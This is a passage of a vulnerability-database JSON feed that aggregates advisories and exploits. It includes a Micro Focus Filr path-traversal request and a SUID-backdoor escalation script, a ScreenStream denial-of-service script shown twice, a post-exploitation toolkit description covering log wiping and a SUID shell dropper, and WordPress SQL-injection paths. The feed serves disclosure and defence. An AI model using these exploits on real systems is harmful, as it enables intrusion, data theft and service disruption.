exit(0);\n}\n\nif (version =~ \"^5\\.\") {\n if (version_is_less(version: version, test_version: \"5.0.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.0.1\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2019-02-22T16:02:28", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-22T00:00:00", "published": "2019-02-22T00:00:00", "id": "EDB-ID:46450", "href": "https://www.exploit-db.com/exploits/46450", "type": "exploitdb", "title": "Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation", "sourceData": "SecureAuth - SecureAuth Labs Advisory\r\nhttp://www.secureauth.com/\r\n\r\nMicro Focus Filr Multiple Vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: Micro Focus Filr Multiple Vulnerabilities\r\nAdvisory ID: SAUTH-2019-0001\r\nAdvisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities\r\nDate published: 2019-02-20\r\nDate of last update: 2019-02-20\r\nVendors contacted: Micro Focus\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Permissions, Privileges, and Access\r\nControl [CWE-264]\r\nImpact: Security bypass, Information leak\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: Yes\r\nCVE Name: CVE-2019-3474, CVE-2019-3475\r\n\r\n3. *Vulnerability Description*\r\n\r\nNovell (now part of Micro Focus [1]) website states that:\r\nMicro Focus Filr [2] provides file access and sharing, and lets users\r\naccess their home directories and network folders from desktops, mobile\r\ndevices, and the Web. Users can also synchronize their files to their PC\r\nor Mac. Changes that they make to downloaded copies are kept in sync\r\nwith the originals on their network file servers. And finally, users can\r\nalso share files internally and externally, and those with the share can\r\ncollaborate with each other by commenting on the files.\r\n\r\nA vulnerability was found in the Micro Focus Filr Appliance, which would\r\nallow an attacker with regular user access to read arbitrary files of\r\nthe filesystem. Furthermore, a vulnerability in the famtd daemon could\r\nallow a local attacker to elevate privileges.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n. Micro Focus Filr 3.4.0.217.\r\n. Older versions are probably affected too, but they were not checked.\r\n\r\n5. *Vendor Information, Solutions and Workarounds*\r\n\r\nMicro Focus released Filr 3.0 Security Update 6 that addresses the\r\nreported issues: https://download.novell.com/Download?buildid=nZUCSDkvpxk~\r\n\r\nAlso, Micro Focus published the following Security Notes:\r\n\r\n. https://support.microfocus.com/kb/doc.php?id=7023726\r\n. https://support.microfocus.com/kb/doc.php?id=7023727\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Matias Choren\r\nfrom SecureAuth. The publication of this advisory was coordinated by\r\nLeandro Cuozzo from SecureAuth Advisories Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *Path Traversal*\r\n\r\n[CVE-2019-3474]\r\nThe 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable\r\nto Path Traversal attacks. An authenticated, low-privileged user may be\r\nable to abuse this functionality in order to read arbitrary files on the\r\nfilesystem.\r\n\r\nProof of Concept:\r\n\r\n\r\n1. As an authenticated user, upload a sample PDF file in the 'My Files'\r\nsection.\r\n2. After the upload finishes, click on the small arrow next to the file\r\n-> 'View Details'.\r\n3. The browser will issue a few requests to the web application, one of\r\nthem being the one used for displaying the thumbnail of the file we've\r\njust uploaded. This request has the following structure:\r\n\r\n/-----\r\nGET\r\n/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=t154758084657912375035546628304890001.jpg\r\n-----/\r\n\r\n4. If the 'viewType' parameter is set to 'image', as in this case, we\r\ncan escape the current directory and include arbitrary files, as long as\r\nthey are readable by the 'wwwrun' user (the user Apache Tomcat is\r\ncurrently running as). For example, we could read the '/etc/passwd' file:\r\n\r\n/-----\r\nGET\r\n/ssf/s/viewFile?binderId=44&entryId=1&entityType=folderEntry&fileId=8a82ada06851d92d016852b727f26b1b&viewType=image&filename=../../../../../../../../../../../etc/passwd\r\nHTTP/1.1\r\nHost: 10.2.45.32:8443\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101\r\nFirefox/60.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531\r\nConnection: close\r\n-----/\r\n\r\n/-----\r\nHTTP/1.1 200 OK\r\nExpires: Thu, 01 Jan 1970 00:00:00 GMT\r\nX-UA-Compatible: IE=Edge\r\nX-Content-Type-Options: nosniff\r\nCache-Control: no-cache\r\nStrict-Transport-Security: max-age=0\r\nX-Frame-Options: SAMEORIGIN\r\nX-XSS-Protection: 1; mode=block\r\nContent-Type: image/jpeg\r\nDate: Mon, 21 Jan 2019 14:53:37 GMT\r\nConnection: close\r\nServer: Filr\r\nContent-Length: 1506\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\nbin:x:1:1:bin:/bin:/bin/bash\r\n\r\n<...>\r\n-----/\r\n\r\n5. Also, an interesting file to look for would be\r\n'/vastorage/conf/vaconfig.zip'. This zip file contains a bunch of\r\ndifferent configuration files, including 'mysql-liquibase.properties'\r\nwhich, among other things, defines connection parameters such as the\r\nusername and password (base64 encoded) for the MySQL database:\r\n\r\n/-----\r\nreferencePassword==?UTF-8?B?Zmlscg==?=\r\nreferenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8\r\nurl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8\r\npassword==?UTF-8?B?Zmlscg==?=\r\ndriver=com.mysql.jdbc.Driver\r\nreferenceUsername=filr\r\nreferenceDriver=com.mysql.jdbc.Driver\r\nusername=filr\r\n-----/\r\n\r\n7.2. *Local Privilege Escalation*\r\n\r\n[CVE-2019-3475]\r\nAs per the description: 'novell-famtd provide CIFS & NCP file access\r\nsupport for Filr server to request and respond to HTTP request coming\r\nfrom Filr Client/ Browser'. This daemon runs during startup and can be\r\nabused to elevate privileges on a Filr appliance.\r\n\r\nProof of Concept:\r\n\r\n1. The 'famtd' binary located at '/opt/novell/filr/bin/' and its\r\ncontaining folder are owned by the 'wwwrun' user, as can be seen next:\r\n\r\n/-----\r\nwwwrun@filr:/opt/novell/filr/bin> ls -lha\r\ntotal 196K\r\ndrwxr-x--- 2 wwwrun www 4,0K ene 21 17:22 .\r\ndrwxr-x--- 8 wwwrun www 4,0K ene 14 18:41 ..\r\n-rwxr-x--- 1 wwwrun www 23K feb 8 2017 famtconfig\r\n-rwxr-x--- 1 wwwrun www 117K ene 14 18:19 famtd\r\n-rwxr-x--- 1 wwwrun www 905 feb 8 2017 famt_log_config.sh\r\n-rwxr-x--- 1 wwwrun www 31K jun 21 2018 kablink-teaming-tools.jar\r\nwwwrun@filr:/opt/novell/filr/bin>\r\n-----/\r\n\r\n2. This binary is referenced and later executed in the\r\n'/etc/init.d/novell-famtd' init script, meaning that it will run with\r\nroot privileges on startup:\r\n\r\n/-----\r\n#\r\n# /etc/init.d/novell-famtd\r\n#\r\n\r\n<...>\r\n\r\n# Check for missing binaries (stale symlinks should not happen)\r\n# Note: Special treatment of stop for LSB conformance\r\nFAMT_BIN=/opt/novell/filr/bin/famtd\r\n\r\n<...>\r\n\r\n## Start daemon with startproc(8). If this fails\r\n## the return value is set appropriately by startproc.\r\nulimit -c unlimited\r\n/sbin/startproc $FAMT_BIN\r\n\r\n<...>\r\n-----/\r\n\r\n3. If an attacker manages to run arbitrary commands on the Filr\r\nappliance as the 'wwwrun' user, they could replace the\r\n'/opt/novell/filr/bin/famtd' binary with, for example, a custom bash\r\nscript that writes a SUID backdoor on the filesystem:\r\n\r\n/-----\r\n#!/bin/bash\r\n\r\n# C snippet for setting group and user identity to 'root'\r\nFILE=\"/tmp/exp.c\"\r\n\r\n/bin/cat <<EOM >$FILE\r\n#include <unistd.h>\r\n\r\nint main(void) {\r\n setgid(0);\r\n setuid(0);\r\n setegid(0);\r\n execl(\"/bin/bash\", \"bash\", 0);\r\n}\r\nEOM\r\n\r\n# Compile it\r\ngcc /tmp/exp.c -o /tmp/exp\r\n\r\n# Set suid bit\r\nchmod -c 4755 /tmp/exp\r\n\r\n# Call the original famtd daemon\r\n/opt/novell/filr/bin/famtd.back\r\n-----/\r\n\r\n4. After a server reboot, we can run '/tmp/exp' and get root privileges\r\non the server:\r\n\r\n/-----\r\nwwwrun@filr:/tmp> id\r\nuid=30(wwwrun) gid=8(www) groups=8(www)\r\nwwwrun@filr:/tmp> ls -lha\r\ntotal 96K\r\ndrwxrwxrwt 18 root root 4,0K ene 21 17:15 .\r\ndrwxr-xr-x 27 root root 4,0K ene 21 14:14 ..\r\n\r\n<...>\r\n\r\n-rwsr-xr-x 1 root root 12K ene 21 17:14 exp\r\n-rw-r--r-- 1 root root 137 ene 21 14:14 exp.c\r\n\r\n<...>\r\n\r\nwwwrun@filr:/tmp> ./exp\r\nfilr:/tmp # id\r\nuid=0(root) gid=0(root) groups=0(root),8(www)\r\nfilr:/tmp #\r\n-----/\r\n\r\n8. *Report Timeline*\r\n2019-01-23: SecureAuth sent an initial notification to Micro Focus including a draft advisory.\r\n2019-01-23: Micro Focus acknowledged reception of initial contact.\r\n2019-01-24: Micro Focus confirmed the reported vulnerabilities and\r\ninformed that they were aiming to deliver a patch around mid February.\r\n2019-01-23: SecureAuth thanks the reply.\r\n2019-02-11: SecureAuth asked for an update.\r\n2019-02-11: Micro Focus replied saying that they were expecting to release the patch by the end of the week.\r\n2019-02-11: SecureAuth proposed to set the publication date for next week.\r\n2019-02-13: Micro Focus confirmed February 20th as the release date.\r\n2019-02-20: Advisory SAUTH-2019-0001 published.\r\n\r\n9. *References*\r\n\r\n[1] https://www.microfocus.com/novell/\r\n[2] https://www.novell.com/documentation/filr-3/filr-overvw/data/what_is_filr.html\r\n\r\n10. *About SecureAuth Labs*\r\n\r\nSecureAuth Labs, the research arm of SecureAuth Corporation, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct research in several important areas of\r\ncomputer security, including identity-related attacks, system\r\nvulnerabilities and cyber-attack planning. Research includes problem\r\nformalization, identification of vulnerabilities, novel solutions and\r\nprototypes for new technologies. We regularly publish security\r\nadvisories, primary research, technical publications, research blogs,\r\nproject information, and shared software tools for public use at\r\nhttp://www.secureauth.com.\r\n\r\n11. *About SecureAuth*\r\n\r\nSecureAuth is leveraged by leading companies, their employees, their\r\ncustomers and their partners to eliminate identity-related breaches.\r\nAs a leader in access management, SecureAuth is powering an identity\r\nsecurity revolution by enabling people and devices to intelligently\r\nand adaptively access systems and data, while effectively keeping bad\r\nactors from doing harm. By ensuring the continuous assessment of risk\r\nand enablement of trust, SecureAuth's highly flexible platform makes\r\nit easier for organizations to prevent the misuse of credentials. To\r\nlearn more, visit www.secureauth.com, call (949) 777-6959,\r\nor email us at info@secureauth.com\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2019 SecureAuth, and are\r\nlicensed under a Creative Commons Attribution Non-Commercial Share-Alike\r\n3.0 (United States) License:", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/46450"}, {"lastseen": "2019-02-21T17:50:58", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "EDB-ID:46443", "href": "https://www.exploit-db.com/exploits/46443", "type": "exploitdb", "title": "ScreenStream 3.0.15 - Denial of Service", "sourceData": "#!/usr/bin/python\r\n#coding: utf-8\r\n\r\n# ************************************************************************\r\n# * Author: Marcelo V\u00e1zquez (aka s4vitar) *\r\n# * ScreenStream 3.0.15 Remote Denial of Service (DoS) *\r\n# ************************************************************************\r\n\r\n# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS)\r\n# Date: 2019-02-21\r\n# Exploit Author: Marcelo V\u00e1zquez (aka s4vitar)\r\n# Vendor Homepage: http://mobzapp.com/mirroring/index.html\r\n# Software Link: https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en\r\n# Version: <= ScreenStream 3.0.15\r\n# Tested on: Android\r\n\r\nimport sys, requests, threading, signal\r\n\r\ndef handler(signum, frame):\r\n print '\\nFinishing program...\\n'\r\n sys.exit(0)\r\n\r\nif len(sys.argv) != 3:\r\n\tprint \"\\nUsage: python \" + sys.argv[0] + \" <ip_address> <port>\\n\"\r\n\tprint \"Example: python \" + sys.argv[0] + \" 192.168.1.125 8080\\n\"\r\n\tsys.exit(0)\r\n\r\ndef startAttack(url):\r\n\turl_destination = url + '/start-stop'\r\n\theaders = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'}\r\n\r\n\tr = requests.post(url_destination, headers=headers)\r\n\r\nif __name__ == '__main__':\r\n\r\n\tsignal.signal(signal.SIGINT, handler)\r\n\turl = 'http://' + sys.argv[1] + ':' + sys.argv[2]\r\n\r\n\tthreads = []\r\n\r\n\tfor i in xrange(0, 10000):\r\n\t\tt = threading.Thread(target=startAttack, args=(url,))\r\n\t\tthreads.append(t)\r\n\r\n\tfor x in threads:\r\n\t\tx.start()\r\n\r\n\tfor x in threads:\r\n\t\tx.join()", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46443"}], "threatpost": [{"lastseen": "2019-02-21T15:59:21", "bulletinFamily": "info", "description": "Popular Windows data compression tool WinRAR has patched a serious 19-year-old security flaw that was discovered on its platform, potentially impacting 500 million users.\n\nThe path-traversal vulnerability, which WinRAR fixed in January, could allow bad actors to remotely execute malicious code on victims\u2019 machines \u2013 simply by persuading them to open a file, researchers with Check Point Software [said on Wednesday](<https://research.checkpoint.com/extracting-code-execution-from-winrar/>).\n\n\u201cWe found a logical bug using the WinAFL fuzzer and exploited it in WinRAR to gain full control over a victim\u2019s computer,\u201d said Nadav Grossman with Check Point in the analysis. \u201cThe exploit works by just extracting an archive, and puts over 500 million users at risk. This vulnerability has existed for over 19 years(!) and forced WinRAR to completely drop support for the vulnerable format.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nWinRAR is a popular file-archiving utility for Windows, which can create and allow viewing of archives in Roshal Archive Compressed (RAR) or ZIP file formats, and unpack numerous archive file formats.\n\nResearchers specifically found a path-traversal vulnerability in unacev2.dll, a third-party dynamic link library in WinRAR used for parsing ACE (a data compression archive file format) archives.\n\nA path-traversal attack allows attackers to access directories that they should not be accessing, like config files or other files containing server data that is not intended for public.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/21093857/fig19.png>)\n\nClick to Expand.\n\nWhen taking a closer look at unacev2.dll, researchers found that \u201cit\u2019s an old dated dll compiled in 2006 without a protection mechanism. In the end, it turned out that we didn\u2019t even need to bypass them,\u201d said Grossman.\n\nDue to the lack of protections and support for unacev2.dll, researchers were able to easily rename an ACE file and give it a RAR extension within unacev2.dll. When opened by WinRAR, the fake ACE file containing a malicious program is extracted to the system\u2019s startup folder \u2013 so the program would automatically begin running when the system starts.\n\nUltimately, if a bad actor used spear-phishing tactics to send an unknowing victim a disguised ACE file, and the victim opened the file in WinRAR, the file would automatically extract in the victim\u2019s startup folder and malware could then be quickly planted on the system.\n\nThe video below shows the proof-of-concept (PoC).\n\nThe PoC makes use of a chain of vulnerabilities (CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253).\n\nAfter researchers informed WinRAR of the issue, the vulnerability was patched in a new version of the software on Jan. 28, [5.70 beta 1](<https://www.win-rar.com/singlenewsview.html?&L=0&tx_ttnews%5Btt_news%5D=111&cHash=7e2fd80e7b9daad5a224dc7cedbcefcb>).\n\nA WinRAR spokesperson told Threatpost: \u201cWe have removed support for the ACE file format from WinRAR in the new Beta version 5.70.\u201d\n\nOn an update on its website, [WinRAR said](<https://www.win-rar.com/whatsnew.html?&L=0>): \u201cWinRAR used this third-party library to unpack ACE archives. unacev2.dll had not been updated since 2005 and we do not have access to its source code. So we decided to drop ACE archive format support to protect security of WinRAR users.\u201d\n\nFile-compression flaws have piqued the interest of exploit vendors such as Zerodium, who earlier last year offered up $10,000 for zero-day vulnerabilities in WinRAR and other compression platforms.\n\n> We're still paying up to $100,000 for [#0day](<https://twitter.com/hashtag/0day?src=hash&ref_src=twsrc%5Etfw>) exploits (code execution) affecting major file archivers: WinRAR, 7-Zip, WinZip (on Windows) or tar (on Linux). For more information: <https://t.co/fKnggJyb0H> [#BigBounties](<https://twitter.com/hashtag/BigBounties?src=hash&ref_src=twsrc%5Etfw>)\n> \n> \u2014 Zerodium (@Zerodium) [October 18, 2018](<https://twitter.com/Zerodium/status/1052984615139340288?ref_src=twsrc%5Etfw>)\n", "modified": "2019-02-21T10:05:45", "published": "2019-02-21T10:05:45", "id": "THREATPOST:2A0DE8F2CA2D7EF6DCC4644E21CEF4FA", "href": "https://threatpost.com/winrar-flaw-500-million-users/142080/", "type": "threatpost", "title": "19-Year-Old WinRAR Flaw Plagues 500 Million Users", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "n0where": [{"lastseen": "2019-02-21T07:10:43", "bulletinFamily": "tools", "description": "ClusterFuzz is a scalable fuzzing infrastructure which finds security and stability issues in software. It is used by Google for fuzzing the Chrome Browser, and serves as the fuzzing backend for [ OSS-Fuzz ](<https://github.com/google/oss-fuzz>) . \n\nClusterFuzz provides many features which help seamlessly integrate fuzzing into a software project\u2019s development process: \n\n * Highly scalable. Google\u2019s internal instance runs on over 25,000 machines. \n * Accurate deduplication of crashes. \n * Fully automatic bug filing and closing for issue trackers ( [ Monorail ](<https://opensource.google.com/projects/monorail>) only for now). \n * Testcase minimization. \n * Regression finding through [ bisection ](<https://en.wikipedia.org/wiki/Bisection_\\(software_engineering\\)>) . \n * Statistics for analyzing fuzzer performance, and crash rates. \n * Easy to use web interface for management and viewing crashes. \n * Support for coverage guided fuzzing (e.g. libFuzzer and AFL) and blackbox fuzzing. \n\n## Requirements \n\nMany features of ClusterFuzz depend on [ Google Cloud Platform ](<https://cloud.google.com>) services. However, it\u2019s possible to run it locally without these dependencies for testing purposes. While ClusterFuzz runs on a number of platforms, local development is only supported on ** Linux ** and ** macOS **\n\n\n\n## Operation \n\nThe two main components of ClusterFuzz are: \n\n * App Engine instance \n * A pool of [ bots ](<https://google.github.io/clusterfuzz/reference/glossary/#bot>)\n\nThe App Engine instance provides a web interface to access crashes, stats and other information. It\u2019s also responsible for scheduling regular cron jobs. Bots are machines which run scheduled tasks. They lease tasks from platform specific queues. The main tasks that bots run are: \n\n * ` fuzz ` : Run a fuzzing session. \n * ` progression ` : Check if a testcase still reproduces or if it\u2019s fixed. \n * ` regression ` : Calculate the revision range in which a crash was introduced. \n * ` minimize ` : Perform testcase [ minimization ](<https://google.github.io/clusterfuzz/reference/glossary/#minimization>) . \n * ` corpus_pruning ` : Minimize a [ corpus ](<https://google.github.io/clusterfuzz/reference/glossary/#corpus>) to smallest size based on coverage (libFuzzer only). \n * ` analyze ` : Run a manually uploaded testcase against a job to see if it crashes. \n\n### Bots \n\nThere are 2 kinds of bots on ClusterFuzz \u2013 preemptible and non-preemptible. \n\nPreemptible means that the machine can shutdown at any time. On these machines we only run ` fuzz ` task. These machines are often cheaper on cloud providers, so it\u2019s recommended to scale using these machines. \n\nNon-preemptible machines are not expected to shutdown. They are able to run all tasks (including ` fuzz ` ) and other critical tasks such as ` progression ` which must run uninterrupted. \n\n[  ](<https://google.github.io/clusterfuzz/>)\n\n[  ](<https://github.com/google/clusterfuzz>)\n", "modified": "2019-02-21T03:51:49", "published": "2019-02-21T03:51:49", "id": "N0WHERE:173092", "href": "https://n0where.net/scalable-fuzzing-infrastructure-clusterfuzz", "title": "Scalable Fuzzing Infrastructure: ClusterFuzz", "type": "n0where", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T07:10:58", "bulletinFamily": "tools", "description": "Orc is a simple post-exploitation written in bash. I wrote this because I myself needed a more featureful post-exploitation toolkit for Linux. It\u2019s part of a larger bundle of scripts and tools, but I\u2019ll add those as I write and re-write them. \n\nIt takes the form of an ENV script, so load orc into a shell by running ENV=o.rc sh -i (it does need an interactive shell, I\u2019m afraid) You can also source it, but that seems to require a CTRL+C, otherwise it hangs. I should probably investigate that. \n\nIt creates a directory (.q) in /dev/shm, and all of the output of commands etc tend to go in there. It will also auto-delete this directory on exit. HISTFILE is unset, and we use ulimit -c 0 to try and prevent any corefiles showing up. \n\nIt also contains a relatively decent selection of useful functions: some are currently not super featureful, and there\u2019s likely to be a large number of bugs, but you can find the vast majority of them by running the command \u2018gethelp\u2019. HOWEVER. An overview: \n\n * getenum takes the versions from the kernel, glibc, and dbus. For privilege escalation exploits, they\u2019re usually the ones you want. It also prints the init system, because it\u2019s good to know that. \n * getinfo pulls basically everything useful and generic i could think of and sticks it in a tar.xz file for you. \n * getrel prints the OS name from the release file \n * getip uses HTTP and DNS to get your external IP. It aims to use curl and dig, but will fall back to wget and host if it needs to. It grabs these from Akami and Google respectively to try and avoid using smaller sites that might flag in a SOC\u2019s logs or alerts. \n * getjail does a check to see if we\u2019re in a chroot, and then does some very basic checks for hypervisors/virtualisation. If there are any better checks, let me know. \n * getsec checks for the presence of SELinux, AppArmor, and GrSec. I thought about adding stuff for rkhunter/chkrootkit, but in my experience they\u2019re not much of a threat unless you\u2019re using rootkits from 2003. \n * getuser gets all users with a shell \n * getpty pops a pty using script. This pty should have Orc already loaded. \n * getidle gives you an accurate idle time for ptys, letting you see how recently other users have been active. \n * getnet is a monstrous attempt to auto-enumerate living hosts on the network. It\u2019s probably broken, probably lacks anything good or right, and does use ping, so yeah. \n * getuservices gets all processes running by users who don\u2019t have a shell. Useful. \n * portscan should be fairly self-evident. It checks for the following open ports on one host: 21, 22, 23, 80, 443, 8080, 8443, 129, 445, 3389, 3306 \n * prochide grabs the longest process name from ps (because we can\u2019t hide arguments, but we can choose something that makes them relatively invisible in the noise) and uses that as the $0 of whatever you execute \n * srm is just a wrapper around shred, basically \n * qsu uses an ASKPASS script to launch sudo without requiring a tty. Apply arguments as usual to sudo. \n * qssh uses an ASKPASS script to launch ssh without requiring a tty. Apply arguments as usual. \n * wiper uses utmpdump to dump wtmp into plaintext and then greps out the string given as an argument. It then repacks the modified file into /var/log/wtmp, and ensures that the file is nicely timestomped. \n * fpssh is just a wrapper around ssh-keyscan. \n * stomp is just an alias for \u201ctouch -r\u201d \n * tools checks for common tools \n * dropsuid basically drops a tiny SUID shell written in ASM wherever. You\u2019ll need to chmod a+sx it. \n * memexec uses some janky perl (see [ https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html ](<https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html>) who I stole much of the basis of it for) to execute a binary in-memory. No arguments or anything yet, and only x64 supported. \n * getdbus lists all dbus services for delicious priv-esc \n * getescape attempts to find a way to escape a chroot by traversing a poorly configured /proc/ \n\n[  ](<https://github.com/zMarch/Orc>)\n", "modified": "2019-02-21T03:15:12", "published": "2019-02-21T03:15:12", "id": "N0WHERE:173085", "href": "https://n0where.net/post-exploitation-framework-for-linux-written-in-bash-orc", "title": "Post-Exploitation Framework for Linux Written in Bash: Orc", "type": "n0where", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-02-22T11:45:13", "bulletinFamily": "NVD", "description": "A memory leak in the kernel_read_file function in fs/exec.c in the Linux kernel through 4.20.11 allows attackers to cause a denial of service (memory consumption) by triggering vfs_read failures.", "modified": "2019-02-21T09:35:05", "published": "2019-02-21T00:29:01", "id": "CVE-2019-8980", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-8980", "title": "CVE-2019-8980", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2019-02-22T10:53:56", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "PACKETSTORM:151797", "href": "https://packetstormsecurity.com/files/151797/ScreenStream-3.0.15-Denial-Of-Service.html", "title": "ScreenStream 3.0.15 Denial Of Service", "type": "packetstorm", "sourceData": "`#!/usr/bin/python \n#coding: utf-8 \n \n# ************************************************************************ \n# * Author: Marcelo VA!zquez (aka s4vitar) * \n# * ScreenStream 3.0.15 Remote Denial of Service (DoS) * \n# ************************************************************************ \n \n# Exploit Title: ScreenStream 3.0.15 Remote Denial of Service (DoS) \n# Date: 2019-02-21 \n# Exploit Author: Marcelo VA!zquez (aka s4vitar) \n# Vendor Homepage: http://mobzapp.com/mirroring/index.html \n# Software Link: https://play.google.com/store/apps/details?id=info.dvkr.screenstream&hl=en \n# Version: <= ScreenStream 3.0.15 \n# Tested on: Android \n \nimport sys, requests, threading, signal \n \ndef handler(signum, frame): \nprint '\\nFinishing program...\\n' \nsys.exit(0) \n \nif len(sys.argv) != 3: \nprint \"\\nUsage: python \" + sys.argv[0] + \" <ip_address> <port>\\n\" \nprint \"Example: python \" + sys.argv[0] + \" 192.168.1.125 8080\\n\" \nsys.exit(0) \n \ndef startAttack(url): \nurl_destination = url + '/start-stop' \nheaders = {'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0', 'Accept': '*/*', 'Referer': url, 'Connection': 'close'} \n \nr = requests.post(url_destination, headers=headers) \n \nif __name__ == '__main__': \n \nsignal.signal(signal.SIGINT, handler) \nurl = 'http://' + sys.argv[1] + ':' + sys.argv[2] \n \nthreads = [] \n \nfor i in xrange(0, 10000): \nt = threading.Thread(target=startAttack, args=(url,)) \nthreads.append(t) \n \nfor x in threads: \nx.start() \n \nfor x in threads: \nx.join() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151797/screenstream3015-dos.txt"}, {"lastseen": "2019-02-22T10:53:56", "bulletinFamily": "exploit", "description": "", "modified": "2019-02-21T00:00:00", "published": "2019-02-21T00:00:00", "id": "PACKETSTORM:151789", "href": "https://packetstormsecurity.com/files/151789/WordPress-Village-5.0-CSRF-Backdoor-SQL-Injection.html", "title": "WordPress Village 5.0 CSRF / Backdoor / SQL Injection", "type": "packetstorm", "sourceData": "`#################################################################### \n \n# Exploit Title : WordPress Village Themes 5.0 CSRF / Backdoor Access / SQL Injection Vulnerability \n# Author [ Discovered By ] : KingSkrupellos \n# Team : Cyberizm Digital Security Army \n# Date : 20/02/2019 \n# Vendor Homepage : themeforest.net/user/themeprovince/portfolio \n# Software Information Link : themeforest.net/item/village-a-responsive-fullscreen-wordpress-theme/237812 \n# Software Version : WordPress 4.2, WordPress 4.1, WordPress 4.0 and 5.0 \n+ Compatible with WPML, WooCommerce 2.2.x \n# Software Price : 59$ \n# Tested On : Windows and Linux \n# Category : WebApps \n# Exploit Risk : Low / Medium \n# Google Dorks : inurl:''/wp-content/themes/village/'' \n# Vulnerability Type : CWE-89 [ Improper Neutralization of \nSpecial Elements used in an SQL Command ('SQL Injection') ] \nCWE-352 [ Cross-Site Request Forgery (CSRF) ] \nCWE-264 [ Permissions, Privileges, and Access Controls ] \nCWE-434 [ Unrestricted Upload of File with Dangerous Type ] \n# PacketStormSecurity : packetstormsecurity.com/files/authors/13968 \n# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ \n# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos \n \n#################################################################### \n \n# Description about Software : \n*************************** \nVillage has an awesome gallery manager that allows you to upload 100s of photos \n \nin just a few clicks. Gallery thumbnails can be portrait or landscape. \n \nVillage allows you to display awesome jQuery walls with ease. \n \nWith Village you can assign a different background or slideshow to each post/page/portfolio. \n \n#################################################################### \n \n# Impact : \n*********** \n* WordPress Village Themes 5.0 and other versions - \n \ncomponent for Joomla is prone to an SQL-injection vulnerability because it \n \nfails to sufficiently sanitize user-supplied data before using it in an SQL query. \n \nExploiting this issue could allow an attacker to compromise the application, \n \naccess or modify data, or exploit latent vulnerabilities in the underlying database. \n \nA remote attacker can send a specially crafted request to the vulnerable application \n \nand execute arbitrary SQL commands in application`s database. \n \nFurther exploitation of this vulnerability may result in unauthorized data manipulation. \n \nAn attacker can exploit this issue using a browser. \n \n* This software is prone to a cross-site request-forgery \n \nvulnerability due to insufficient CSRF protection. \n \nAn attacker can exploit this issue to perform certain unauthorized actions \n \nand gain access to the affected application. Other attacks are also possible. \n \nThe web application does not, or can not, sufficiently verify whether a \n \nwell-formed, valid, consistent request was intentionally provided by the user \n \nwho submitted the request. \n \n* The software allows the attacker to upload or transfer files of \n \ndangerous types that can be automatically processed within the product's environment. \n \n* Weaknesses in this category are related to the management of permissions, privileges, \n \nand other security features that are used to perform access control. \n \n#################################################################### \n \n# SQL Injection Exploit => \n*********************** \n/wp-content/themes/village/index.php?id=[SQL Injection] \n \n# Direct Access Exploit => \n*********************** \n/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php \n \nVulnerability Error 